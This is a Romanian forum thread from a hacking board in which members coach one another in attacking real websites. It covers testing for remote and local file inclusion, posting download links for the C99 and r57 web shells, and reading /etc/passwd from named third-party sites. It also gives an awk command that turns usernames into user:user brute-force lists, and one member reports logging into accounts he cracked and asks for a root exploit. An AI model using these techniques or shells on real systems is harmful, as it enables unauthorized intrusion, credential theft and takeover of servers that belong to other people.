Simpatie.ro - matrimoniale
Hacking and more...
HaCkinG CulT
Nou pe simpatie:
Profil BrianaS
Femeie
23 ani
Bucuresti
cauta Barbat
26 - 57 ani
Hacking and more...ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Hacking and more... / S.O.S. /

C99 Shell Problem[RFI]

Pagini:  1 2 Moderat de Shocker
#1
NkE
Membru nou
Din: Ironforge
Postari: 7

Am incercat mai multe siteuri de gen

Code:

index.php?page=blabla.php

Am inlocuit blabla.php cu http://google.ro

Code:

www.site.com/index.php?page=http://google.ro

Dar a ramas la fel. Asta inseamna ca site-ul nu este vulnerabil?


_______________________________________


 
   
#2
Zero_Cool
Pe lista neagra
Postari: 796

NkE a scris:


Dar a ramas la fel. Asta inseamna ca site-ul nu este vulnerabil?






 
   
#3
NkE
Membru nou
Din: Ironforge
Postari: 7
Aha.. multumesc 
Zero am o rugaminte.. uploadeaza te rog r57 si c99 ca linkurile care le-ai dat tu nu mai exista , si cele de rapidshare au expirat 


_______________________________________


 
   
#4
Zero_Cool
Pe lista neagra
Postari: 796
uite c99shell

http://redhat.by.ru/c99.txt

si uite r57 (cred ca e in rusa, da poti sa modifici limba din shell, cauti ceva de genu ['RU'] in loc de RU bagi EN :zzz

http://www.xfocus.net/tools/200608/r57.txt


 
   
#5
NkE
Membru nou
Din: Ironforge
Postari: 7
Oo da , multumesc  :* 
r57 mi-l gaseste ca Trojan .


_______________________________________


 
   
#6
Hooligan
Old School Member
Din: Zion
Postari: 461

NkE a scris:

Oo da , multumesc  :* 
r57 mi-l gaseste ca Trojan .

si pe c99 tot il detecteaza ca virus dar i-al cu incredere ca nu vei avea nici o problema


_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!

 
   
#7
Shocker
Super Moderator
Din: localhost
Postari: 2084


Code:

http://shockingsoft.uv.ro/r57.txt
http://shockingsoft.uv.ro/c99.txt

E normal sa le detecteze ca troieni, nu te speria


_______________________________________
ShockingSoft is back
Freakz only
Comics of the day

 
   
#8
dark_fabian
Old School Member
Din: Giran Castel Town
Postari: 485
frate cum imi pot baga in mozila faza cu c99 sa o am intr-un patratel?

_______________________________________


 
   
#9
Dynamyc
Elite Member
Din: de peste tot
Postari: 836
cred ca te referi la bookmark
daca da , faci asa: sub adress bar apesi click dreapta si dai new bookmark
LE: la Mozzila Firefox


_______________________________________




 
   
#10
dark_fabian
Old School Member
Din: Giran Castel Town
Postari: 485
a da ms mia mers ce pinguiin is

_______________________________________


 
   
#11
OSHO
Elite Member
Din: Cluj
Postari: 2069
E vulnerabil site-ul dar nu la RFI. Un site nu trebuie sa fie vulnerabil la Remote File Inclusion ca sa poti face ceva. La fel de bine iti poti face treaba si daca poti include fisiere din interior. Problema e sa iti folosesti capul si sa inveti sa folosesti sistemele UNIX asa cum trebuie.

http://www.sierramadreacademy.com/index ... etc/passwd


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#12
Tzeus
Senior
Din: Pat
Postari: 129
Da e vulnerabil totusi ce ar tb sa facmai departe? Pentru ca parolele nu se afla in fisierul /etc/passwd. Am doar userii. AM intalnit si eu cazuri. Si mai e ceva...am vazut un video tutorial postat aici pe forum. Si invidul de acolo face de /etc/passwd si intra apoi cu Brutus.In tutorial el foloseste un script perl pentru. Scriptul ia un text de genul
root:0:0:root:/root:/bin/bash bin:1:1:bin:/bin:/sbin/nologin daemon:2:2:daemon:/sbin:/sbin/nologin
iar la output are root:root. L-am cautat pe net dar nu am gasit decat o pagina in rusa care ar fi dat niste explicatii...iar eu rusa nu stiu.Nici programare. Stii despre ce este vorba?. Scriptul se numea pars.pl.


_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"

 
   
#13
OSHO
Elite Member
Din: Cluj
Postari: 2069
Dupa cum am spus trebuie sa stii sa folosesti sistemele UNIX. Gandeste-te cu ce te ajuta ca ai acces la /etc/passwd sau la alte fisiere care tin de securitatea sistemului iar apoi gandeste-te cum ai putea sa te folosesti de asta.
Gandeste-te ca ai cativa useri reali acolo. Pune-ti problema cati din ei au parole aiurite (cum ar fi userul sau numele lor). Fa rost de un cont. Nu conteaza ca toti au la shell /sbin/nologin, pentru ca au acces la FTP si odata ce ai urcat un C99 in /tmp faci tot ce faceai si cu un C99 urcat remote. Pune-ti putin mintea la lucru.


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#14
dark_fabian
Old School Member
Din: Giran Castel Town
Postari: 485
OSHO esti tare frate

_______________________________________


 
   
#15
Tzeus
Senior
Din: Pat
Postari: 129
@OSHO Esti intr-adevar tare . Dar ai experienta. M-am gandit deja ca un user de acolo s-ar putea sa aiba o parola aiurita si as putea sa fac rost de un cont si chiar daca este nologin pot sa il folosesc ca ftp. La faza cu c99 nu m-am gandit. Din experienta vin si idei. Nu m-a interesat sa dau cu brutus sa vad daca are vreo unul parola aiurita, in primul rand nu l-am gasit eu .
De faza cu parserul ala stii ceva? Ca m-ar ajuta tare :|.


_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"

 
   
#16
OSHO
Elite Member
Din: Cluj
Postari: 2069
Mersi de aprecieri. Intotdeauna sunt bine venite

Din cate am inteles, e un script care pregateste un fisier pentru un program de brute-force. Programele de brute-force care sunt cat de cat respectabile pot primi un fisier de forma user:parola ca sa testeze conturile. Asta face si scriptul respectiv. Pentru cazul de fata le poti face si manual ca nu e mare lucru. Daca ai mai multe inregistrari si nu vrei sa faci manual ai putea sa folosesti o combinatie de cat si awk:

Code:

cat /etc/passwd | awk -F: '{ printf("%s:%sn",$1,$1) }'



_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#17
Tzeus
Senior
Din: Pat
Postari: 129
Mersi! Stiam ce face voiam doar sa stiu cum . Si daca sunt 20 de intrari nu e o problema le fac manual dar daca sunt 100?

_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"

 
   
#18
Sinnerman
Grand Master
Postari: 322

OSHO a scris:

Daca ai mai multe inregistrari si nu vrei sa faci manual ai putea sa folosesti o combinatie de cat si awk:



cat /etc/passwd | awk -F: '{ printf("%s:%sn",$1,$1) }'





_______________________________________
Toate drumurile care duc in iad sunt drumuri cu sens unic.

 
   
#19
Tzeus
Senior
Din: Pat
Postari: 129
Chestia asta am facut-o asha:
url/page?=/etc/passwd
Deci acces la sistem nu am ca sa pot da:
cat /etc/passwd | awk -F: '{ printf("%s:%sn",$1,$1) }'

Si ca tot vorbeam de cazul in care gasesc asa o pagina cu vreo 100 de linii. Am gasit una am copiat toti userii intr-un txt si are 1.67 MB.

Noroc ca am instalat cygwin. Totusi cum fac sa imi creeze un fisier in care scoate outputul?


_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"

 
   
#20
OSHO
Elite Member
Din: Cluj
Postari: 2069

Tzeus a scris:

Chestia asta am facut-o asha:
url/page?=/etc/passwd
Deci acces la sistem nu am ca sa pot da:
cat /etc/passwd | awk -F: '{ printf("%s:%sn",$1,$1) }'

Nu trebuie sa ai acces la sistem ca sa poti rula comanda respectiva. Fa rost de un shell (unu free, sau un LiveCD). Iei liniile din browser si le salvezi intr-un fisier text, intri in shell si inlocuiesti /etc/passwd cu fisierul in care ai salvat userii.

LE: Acum am vazut ca ai modificat in timp ce dadeam reply. Foloseste redirectarea iesirii:

Code:

cat /etc/passwd | awk -F: '{ printf("%s:%sn",$1,$1) }' > final.txt



_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#21
Tzeus
Senior
Din: Pat
Postari: 129
Stiam eu ca era ceva de genul asta dar uitasem. Thx OSHO!!!
P.S. tu ai ceva cu avatarurile de genul asta. Am mai vazut si in alta parte )

LE:

Am facut exact cum ai spus tu. Totusi am o nelamurire. Daca dau cat final.txt mi le afiseaza cum trebuie. Daca dau oepn cu notepad din win mi le arata in linie dar separate de un "patratel". Ma poate incurca asta daca fac bruteforce cu brutus?

Si inca ceva. Vreau sa fac un alias pentru toata comanda asta cu "cat fisier | awk -F...."

Problema este urmatoarea Daca am mai multe fisiere trebuie sa le redenumesc pe fiecare. Se poate sa bag o variabila in alias pentru fisierul sursa si una pentru fisierul final?

Ceva de genul asta:
alias comanda='cat $fisiersursa | awk -F: '{ printf("%s:%sn",$1,$1) }' > $fisierfinal'

iar comanda sa fie: comanda fisiersursa fisierfinal

sau trebuie sa fac un script separat care sa faca treaba asta?


LE: Si daca au la shel /bin/false ce inseamna?
     Iar daca au la shell /noshell e acelasi lucru ca si nologin?


Iar Brutus nu imi merge. In momentul in care ii dau start se inchide.


_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"

 
   
#22
Tzeus
Senior
Din: Pat
Postari: 129
Ok. Nu vreau sa folosesc dublu post dar nu stiu de ce nu pot sa dau modifica. Am luat cateva conturi de ftp care au user indentic cu parola. La unul din servere a mers sa ma conectez cu Telnetul. Avea Debian 3.1 kernel 2.4.32 Am cautat un exploit dar nu am reusit sa gasesc pana acum. Poate sa ma ajute cineva? Brutus imi da multe erori. Si nu orea inteleg eu ce zice acolo...Am citit si Readme si un FAQ+inca cateva docuri de pe net dar nu m-au lamurit cu mesajele de eroare cum ar fi
Warning! Too many consecutive errors aborting attack
Last Error was: Authentication Sequence Error due to unexpected data in username prompt


Sau
Warning - (Due to unexpected data in username prompt).

Deci raman cele doua probleme la care nu stiu raspunsul inca:
1. UnXploit pentru Debian 3.1 kernel 2.4.32
2. Ce cauzeaza erorile la Brutus?


_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"

 
   
#23
OSHO
Elite Member
Din: Cluj
Postari: 2069
Vai, da' multe intrebari stii sa pui 
OK, hai sa incerc sa iti raspund pe rand.
1. In windows iti arata diferit din cauza ca in UN*X linia unui fisier text se termina cu LF (Line Feed) iar in Windows si MS-DOS linia se termina cu CRLF (Carriage Return & Line Feed). Pe mac doar cu CR. Din cauza asta un fisier text facut in UN*X il vei citi din Windows ca un rand lung cu tot felul de patratele - LF, daca nu este si CR nu il detecteaza ca rand nou. Daca incerci invers, sa iei un fisier text facut in Windows si sa il deschizi in UN*X vei vedea ca apar randurile noi (citeste LF-ul) dar apare un caracter in plus la fiecare rand (CR-ul). In principiu poti folosi cu brutus fisiere facute in UN*X. Daca nu merge, deschide cu Wordpad si "Save As".

2. Mai bine fa-ti un shell script. De exemplu:

Code:

#!/bin/sh

sursa="$1"
cat $sursa | awk -F: '{ printf("%s:%sn",$1,$1) }'

Il salvezi ca shell.sh, ii pui permisiunile corecte (chmod 755 shell.sh) si apoi il rulezi dandu-i ca parametru fisierul care te intereseaza. Daca ai passwd, ii dai: ./shell.sh passwd > final.txt

3. /bin/false e acelasi lucru ca noshell sau nologin. E un soft care nu face nimic. Cand te loghezi, iti inchide sesiunea.

La brutus si la exploit nu ma bag. Nu le-am folosit de mult timp si mai bine tac decat sa vorbesc prostii.


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#24
Tzeus
Senior
Din: Pat
Postari: 129
M-am prins de ce nu puteam sa dau modifica ). Nu eram Logat, eram pe celalat comp . Problema cu LF/CRLF am rezolvat-o deschizand fisierul cu Wordpad apoi stergand cateva caractere si salvand. . Cu shell scriptul am luat-o babeste, amfacut unscript incare am bagat:

Code:

#!/bin/bash
cat sursa1 | awk -F: '{ printf("%s:%sn",$1,$1) }' > fisieroutput1;
cat sursa2 | awk -F: '{ printf("%s:%sn",$1,$1) }' > fisieroutput2;
cat sursa3 | awk -F: '{ printf("%s:%sn",$1,$1) }' > fisieroutput3;
cat sursa4 | awk -F: '{ printf("%s:%sn",$1,$1) }' > fisieroutput4;

Caut in continuare unexploit pentru Debian3.1 cu kernel 2.4.32

Mersi OSHO pentru raspunsuri.


_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"

 
   
#25
weaver
Grand Master
Postari: 208
hmmm..am si eu o problema cu c99  sa va explic:
1) Site-ul http://iaald.org/cee/index.php?page=http://google.ro este vulnerabil la RFI
2) Am copiat c99.txt in format php pe un site "www.site.lx.ro/c99.php"

Problema este ca imi apare ceva ciudat  :

Daca pun http://iaald.org/cee/index.php?page=htt ... ro/c99.php imi apare in shell continutul site-ului meu in loc de cel a site-ului vulnerabil.
As dori sa-mi spuna careva unde gresesc      pls


_______________________________________
Catre  :Google

 
   
Pagini:  1 2  
Mergi la